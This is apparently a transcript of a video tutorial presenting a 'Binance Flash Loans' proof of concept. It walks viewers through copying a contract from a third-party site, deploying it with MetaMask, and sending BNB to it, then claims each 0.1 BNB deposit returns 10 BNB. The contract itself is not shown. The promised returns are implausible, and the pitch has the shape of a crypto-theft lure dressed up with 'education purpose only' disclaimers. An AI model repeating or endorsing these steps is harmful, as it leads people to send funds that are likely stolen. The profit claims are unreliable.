Hello there. I'm here to present you a proof of concept. This is for education purpose only. This project is based on Binance Flash Loans. I've managed to build this contract by using a third-party website for the Flash loan. Just click on the new file icon, name your contract, copy the contract, paste it in here. Everything will be imported. Before we continue, you need to make sure that you have at least 0.15 BNB in your MetaMask. Click on the third icon on the left side. Make sure here is injected Web3. This is your wallet. Come down here. Here you're gonna name your contract, symbol, and how much BNB you would like to get. When you click transact, MetaMask will automatically open. Pay the fee for the creation of the contract. Now that the contract is created, we need to send some BNB to the contract by copying this address. We're going to the MetaMask, send, paste in here, and I'll send 0.15. No, I'll try with 0.1. Press next, confirm, and we need to wait for the confirmation. Let's see if the BNB was sent. Alright, so it was sent. Now let's press action. Confirm the payment. We're gonna wait for the transaction to go through. As you can see, it went through. Let's verify the account. There we go. 10 BNB. Let's try this one again. I'm gonna pass the contract. 0.1. True. Sometimes it takes a little bit longer. Oh, I forgot to press action. Let's see. There we go, another 10 BNB. Don't forget, this is education purpose only. If it doesn't work for you, it means somebody somewhere found a way to patch it.